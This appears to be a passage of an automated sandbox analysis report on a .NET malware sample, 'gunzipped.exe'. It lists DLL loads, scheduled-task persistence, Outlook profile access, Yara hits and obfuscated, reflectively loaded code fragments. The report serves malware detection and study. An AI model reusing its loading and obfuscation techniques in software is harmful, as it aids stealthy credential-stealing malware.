Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: samlib.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                      Source: gunzipped.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: gunzipped.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: gunzipped.exe, Customer.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: mPvIOxEZXJsdYp.exe.0.dr, Customer.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.cs | .Net Code: nqR0o9sBDELYtmXPGJ6 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.cs | .Net Code: nqR0o9sBDELYtmXPGJ6 System.Reflection.Assembly.Load(byte[])
                      Source: Yara match | File source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_052EDDA1 push ebx; ret 0_2_052EDDA8
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_052E9EA0 push eax; mov dword ptr [esp], ecx 0_2_052E9EA4
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0585F887 pushad ; retf 8_2_0585F888
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0585F87D pushad ; retf 8_2_0585F87E
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_072248E7 push es; ret 8_2_0722490C
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0742AAB2 push ds; ret 8_2_0742AAB3
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 13_2_00402AC0 push eax; ret 13_2_00402AD4
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 13_2_00402AC0 push eax; ret 13_2_00402AFC
                      Source: gunzipped.exe | Static PE information: section name: .text entropy: 7.958469565640936
                      Source: mPvIOxEZXJsdYp.exe.0.dr | Static PE information: section name: .text entropy: 7.958469565640936
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, bqm8VYzAoI4TqX0HlQ.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pggOlnLVtw', 'GCnOLISRm7', 'L3xO2ORmMg', 'NdMOeHmSi8', 'UXqOEnElsb', 'FyqOOBnNQN', 'TS0OYZ4NOf'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, TBf20b07Pm0yAXHpaX.cs | High entropy of concatenated method names: 'UUvW6LdP1', 'mHr8x0cEH', 'UXPhVKxn4', 'fvlg3IZAy', 'irrUNUbB1', 'eCldUGynG', 'mf61ydnNeuI55gRfRG', 'suMk0wr38nxm7KVlO1', 'STkEEmrac', 'jyQYhdkrN'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, lfMEOk1XbiFlh7aNLt.cs | High entropy of concatenated method names: 'KF9Pon0STn', 't69PA64Vkc', 'aSHPmrCiA0', 'a1rPqTDHiJ', 'cinPLnmYq6', 'gk2P2qw6Ic', 'oKIMS2CuiiVo5VmgFu', 'G7NL27uA9aAZJn0qPy', 'slxPPNKHnk', 'QahPtBKE1q'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, SrGMToCY8IuKIaqFwN.cs | High entropy of concatenated method names: 'ToString', 'DOf2j9F6fx', 'X2y2sggvVD', 'JhU25pYMP9', 'Fud2VKsqD0', 'f862NnD3pQ', 'nuX2H9AAu5', 'k362boR364', 'IZe2uX6Ge8', 'P6W244IAAK'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, WpAqRTfsZwXL6EEweX.cs | High entropy of concatenated method names: 'ERKemRshCS', 'FcXeqg58w5', 'ToString', 'aLVervj2Qw', 'uR7eJMHngJ', 'WExe9Y06AW', 'rCAeXaX3dv', 'DoMex0fnB5', 'v9LeofAvoH', 'IYweAq9vnV'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, dAALak3ZAtSNj79518.cs | High entropy of concatenated method names: 'PxgErR5Eob', 'YTmEJ4wGV5', 'q6sE9ptCBg', 'jb7EXsIRF7', 'FOeExvBS6y', 'GuwEotsLP6', 'cFmEAGCPS8', 'qN5EyQs0IL', 'cJEEmaIHxx', 'uroEqY8JmE'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, tG9fxIUSHrCiA0I1rT.cs | High entropy of concatenated method names: 'ofF98Ey09K', 'FTt9h9yJLm', 'lsO9TyQff4', 'vot9UP0Nmh', 'bXS9L8KIjo', 'ovZ928jMJW', 'PGK9eQk9lm', 'WHO9EJ2ZIx', 'KBZ9OQQmtL', 'Bqe9Y9m24b'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, XlBHpd48ALb7kEfdTk.cs | High entropy of concatenated method names: 'xpkop4PCCC', 'QZLoSTJXZX', 'l4voW5t6IY', 'AAAo8RDtSc', 'uq8onSHZZx', 'ba1oh5dchR', 'RIIogN0QN9', 'GHxoTo0dn1', 'rddoUsYdvN', 'w5uodmuqe2'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, tq6Jk2cqw6IcgF03NR.cs | High entropy of concatenated method names: 'bN6x736MGg', 'GqmxJA28Wi', 'K8txXSPrny', 'wJfxopXXDw', 'ldDxA1lLU3', 'skOXk0pKUK', 'UR9XZmAjCI', 'M1OXKTnnhi', 'Sh1X3PbFbO', 'eidXa8rPDH'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, eHdT6rwUbADaxa7kJW.cs | High entropy of concatenated method names: 'ojiOPBg4o0', 'qnpOtcwCUa', 'h2gO1OuHN7', 'MtxOr3Z98C', 'OtsOJDHiDk', 'HELOXIRDWG', 'avHOxqsmeT', 'L9gEKVBPIv', 'Dm1E3Tdy1f', 'OJfEaXrf3y'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, B8eLaGJcwW1e49fRCP.cs | High entropy of concatenated method names: 'Dispose', 'cF9PaWeBEx', 'ESx0sSWB8i', 'FU8oo6CK4U', 'f1APwALakZ', 'ktSPzNj795', 'ProcessDialogKey', 'd8o0IKdPSj', 'AIC0Pe2FBf', 'QNK007HdT6'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, ulQeCjbMDHB7w4nCRw.cs | High entropy of concatenated method names: 'ol0or6Mqvf', 'CFKo91i2ED', 'q60oxtbc62', 'sPCxwHqDyT', 'zXOxzHCfCN', 'IrAoItG9sl', 'uO3oPfRYhp', 'Bd0o0dYOHC', 'vluotdpy9Q', 'DQPo16w0hQ'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, f8l6ydsUUxLZBoHa0q.cs | High entropy of concatenated method names: 'q32d5Vg6lKGoY21OJ6k', 'n7TrFGg7UBKsHeJZjwj', 'EdtxEkPPHl', 'VvQxOU81fS', 'L7KxYdtkiW', 'GCduyLgZ1fU9FWIONgA', 'RtIo7Igw7r7eX6Bp0UG'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, jKdPSjanICe2FBfQNK.cs | High entropy of concatenated method names: 'aSKEcfjHJL', 'aJ9EsCE85D', 'ACbE5UBhNk', 'dmvEVFjRh6', 'el0EBpf25p', 'bxUEN8rjvg', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, NHiJx8dK0vlYEtinnm.cs | High entropy of concatenated method names: 'P4ZXnaYjOb', 'd54XgO10ZT', 'vyA959loDW', 'smZ9VKZlvh', 'Fbq9ND3jF0', 'CIs9H4n76H', 'ai29befJMi', 'pNv9uXWquC', 'Gjx94IEHpw', 'cM69Db87t8'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, XJp8yKPI9TCfdAga7UT.cs | High entropy of concatenated method names: 'K2jOpXFQh4', 'sD0OS7tueF', 'nUkOWpIRqa', 'YTjO8psTxO', 'H8xOnQVMtO', 'cAgOhLUy0L', 'NhGOgH6Yqs', 'W7VOTeOLd7', 'yEuOU7BGfG', 'IwVOdTN9oJ'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, vtoUeaQlyeJCI1QUmm.cs | High entropy of concatenated method names: 'N5AlTQ8VeN', 'ayalULLxgG', 'XSolcRjgte', 'ooGlsa8tBG', 'kvQlVnLs2Y', 'UAdlNSWTiQ', 'KGClbx0gD3', 'd7IluyIE8q', 'nHalDi8HN4', 'iw6ljaB46o'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.cs | High entropy of concatenated method names: 'opet7oIWjR', 'B28tr1tH8M', 'S9FtJwJ5m3', 'hgmt9kZH15', 'j76tXNnpMu', 'ajhtxU8hfF', 'KrFto2n5bD', 'H5VtANCb8f', 'GFptyobMM4', 'LvqtmenBiL'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, HEfuBjPtoGIsVlP13HW.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TgIYBqNlei', 'ut3YvhyOQw', 'jMTYCDXek9', 'r6EYf54Ehe', 'JLCYkcIieF', 'wBUYZYpDgb', 'CXnYK14ufB'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, hn0STnT66964Vkc389.cs | High entropy of concatenated method names: 'dnaJBL7Iua', 'NsJJvExmgi', 'PChJC5mS4S', 'svZJfqFVki', 'r39JkA9JeS', 'w86JZLpig5', 'ICQJKgp1R4', 'OdrJ3rIVRD', 'VLQJa4W9jw', 'VbxJwifLkH'
                      Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, MJclrqZHjO7Fdl7QeF.cs | High entropy of concatenated method names: 'qu4e3Ik1Mh', 'nlkewg5aJx', 'cXCEIA5YP7', 'mVEEPqWQmP', 'z2Rej2TYJg', 'XmReGaTvJv', 'mY0eQmwCc7', 'qT0eBqeccR', 'iCQevDXc5Z', 'DRBeCy2avH'
                      Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs | High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                      Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, vpednoN8EZgsJ4TDwx.cs | High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                      Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs | High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                      Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, vpednoN8EZgsJ4TDwx.cs | High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, bqm8VYzAoI4TqX0HlQ.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pggOlnLVtw', 'GCnOLISRm7', 'L3xO2ORmMg', 'NdMOeHmSi8', 'UXqOEnElsb', 'FyqOOBnNQN', 'TS0OYZ4NOf'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, TBf20b07Pm0yAXHpaX.cs | High entropy of concatenated method names: 'UUvW6LdP1', 'mHr8x0cEH', 'UXPhVKxn4', 'fvlg3IZAy', 'irrUNUbB1', 'eCldUGynG', 'mf61ydnNeuI55gRfRG', 'suMk0wr38nxm7KVlO1', 'STkEEmrac', 'jyQYhdkrN'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, lfMEOk1XbiFlh7aNLt.cs | High entropy of concatenated method names: 'KF9Pon0STn', 't69PA64Vkc', 'aSHPmrCiA0', 'a1rPqTDHiJ', 'cinPLnmYq6', 'gk2P2qw6Ic', 'oKIMS2CuiiVo5VmgFu', 'G7NL27uA9aAZJn0qPy', 'slxPPNKHnk', 'QahPtBKE1q'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, SrGMToCY8IuKIaqFwN.cs | High entropy of concatenated method names: 'ToString', 'DOf2j9F6fx', 'X2y2sggvVD', 'JhU25pYMP9', 'Fud2VKsqD0', 'f862NnD3pQ', 'nuX2H9AAu5', 'k362boR364', 'IZe2uX6Ge8', 'P6W244IAAK'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, WpAqRTfsZwXL6EEweX.cs | High entropy of concatenated method names: 'ERKemRshCS', 'FcXeqg58w5', 'ToString', 'aLVervj2Qw', 'uR7eJMHngJ', 'WExe9Y06AW', 'rCAeXaX3dv', 'DoMex0fnB5', 'v9LeofAvoH', 'IYweAq9vnV'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, dAALak3ZAtSNj79518.cs | High entropy of concatenated method names: 'PxgErR5Eob', 'YTmEJ4wGV5', 'q6sE9ptCBg', 'jb7EXsIRF7', 'FOeExvBS6y', 'GuwEotsLP6', 'cFmEAGCPS8', 'qN5EyQs0IL', 'cJEEmaIHxx', 'uroEqY8JmE'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, tG9fxIUSHrCiA0I1rT.cs | High entropy of concatenated method names: 'ofF98Ey09K', 'FTt9h9yJLm', 'lsO9TyQff4', 'vot9UP0Nmh', 'bXS9L8KIjo', 'ovZ928jMJW', 'PGK9eQk9lm', 'WHO9EJ2ZIx', 'KBZ9OQQmtL', 'Bqe9Y9m24b'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, XlBHpd48ALb7kEfdTk.cs | High entropy of concatenated method names: 'xpkop4PCCC', 'QZLoSTJXZX', 'l4voW5t6IY', 'AAAo8RDtSc', 'uq8onSHZZx', 'ba1oh5dchR', 'RIIogN0QN9', 'GHxoTo0dn1', 'rddoUsYdvN', 'w5uodmuqe2'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, tq6Jk2cqw6IcgF03NR.cs | High entropy of concatenated method names: 'bN6x736MGg', 'GqmxJA28Wi', 'K8txXSPrny', 'wJfxopXXDw', 'ldDxA1lLU3', 'skOXk0pKUK', 'UR9XZmAjCI', 'M1OXKTnnhi', 'Sh1X3PbFbO', 'eidXa8rPDH'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, eHdT6rwUbADaxa7kJW.cs | High entropy of concatenated method names: 'ojiOPBg4o0', 'qnpOtcwCUa', 'h2gO1OuHN7', 'MtxOr3Z98C', 'OtsOJDHiDk', 'HELOXIRDWG', 'avHOxqsmeT', 'L9gEKVBPIv', 'Dm1E3Tdy1f', 'OJfEaXrf3y'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, B8eLaGJcwW1e49fRCP.cs | High entropy of concatenated method names: 'Dispose', 'cF9PaWeBEx', 'ESx0sSWB8i', 'FU8oo6CK4U', 'f1APwALakZ', 'ktSPzNj795', 'ProcessDialogKey', 'd8o0IKdPSj', 'AIC0Pe2FBf', 'QNK007HdT6'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, ulQeCjbMDHB7w4nCRw.cs | High entropy of concatenated method names: 'ol0or6Mqvf', 'CFKo91i2ED', 'q60oxtbc62', 'sPCxwHqDyT', 'zXOxzHCfCN', 'IrAoItG9sl', 'uO3oPfRYhp', 'Bd0o0dYOHC', 'vluotdpy9Q', 'DQPo16w0hQ'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, f8l6ydsUUxLZBoHa0q.cs | High entropy of concatenated method names: 'q32d5Vg6lKGoY21OJ6k', 'n7TrFGg7UBKsHeJZjwj', 'EdtxEkPPHl', 'VvQxOU81fS', 'L7KxYdtkiW', 'GCduyLgZ1fU9FWIONgA', 'RtIo7Igw7r7eX6Bp0UG'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, jKdPSjanICe2FBfQNK.cs | High entropy of concatenated method names: 'aSKEcfjHJL', 'aJ9EsCE85D', 'ACbE5UBhNk', 'dmvEVFjRh6', 'el0EBpf25p', 'bxUEN8rjvg', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, NHiJx8dK0vlYEtinnm.cs | High entropy of concatenated method names: 'P4ZXnaYjOb', 'd54XgO10ZT', 'vyA959loDW', 'smZ9VKZlvh', 'Fbq9ND3jF0', 'CIs9H4n76H', 'ai29befJMi', 'pNv9uXWquC', 'Gjx94IEHpw', 'cM69Db87t8'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, XJp8yKPI9TCfdAga7UT.cs | High entropy of concatenated method names: 'K2jOpXFQh4', 'sD0OS7tueF', 'nUkOWpIRqa', 'YTjO8psTxO', 'H8xOnQVMtO', 'cAgOhLUy0L', 'NhGOgH6Yqs', 'W7VOTeOLd7', 'yEuOU7BGfG', 'IwVOdTN9oJ'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, vtoUeaQlyeJCI1QUmm.cs | High entropy of concatenated method names: 'N5AlTQ8VeN', 'ayalULLxgG', 'XSolcRjgte', 'ooGlsa8tBG', 'kvQlVnLs2Y', 'UAdlNSWTiQ', 'KGClbx0gD3', 'd7IluyIE8q', 'nHalDi8HN4', 'iw6ljaB46o'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.cs | High entropy of concatenated method names: 'opet7oIWjR', 'B28tr1tH8M', 'S9FtJwJ5m3', 'hgmt9kZH15', 'j76tXNnpMu', 'ajhtxU8hfF', 'KrFto2n5bD', 'H5VtANCb8f', 'GFptyobMM4', 'LvqtmenBiL'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, HEfuBjPtoGIsVlP13HW.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TgIYBqNlei', 'ut3YvhyOQw', 'jMTYCDXek9', 'r6EYf54Ehe', 'JLCYkcIieF', 'wBUYZYpDgb', 'CXnYK14ufB'
                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, hn0STnT66964Vkc389.cs | High entropy of concatenated method names: 'dnaJBL7Iua', 'NsJJvExmgi', 'PChJC5mS4S', 'svZJfqFVki', 'r39JkA9JeS', 'w86JZLpig5', 'ICQJKgp1R4', 'OdrJ3rIVRD', 'VLQJa4W9jw', 'VbxJwifLkH'
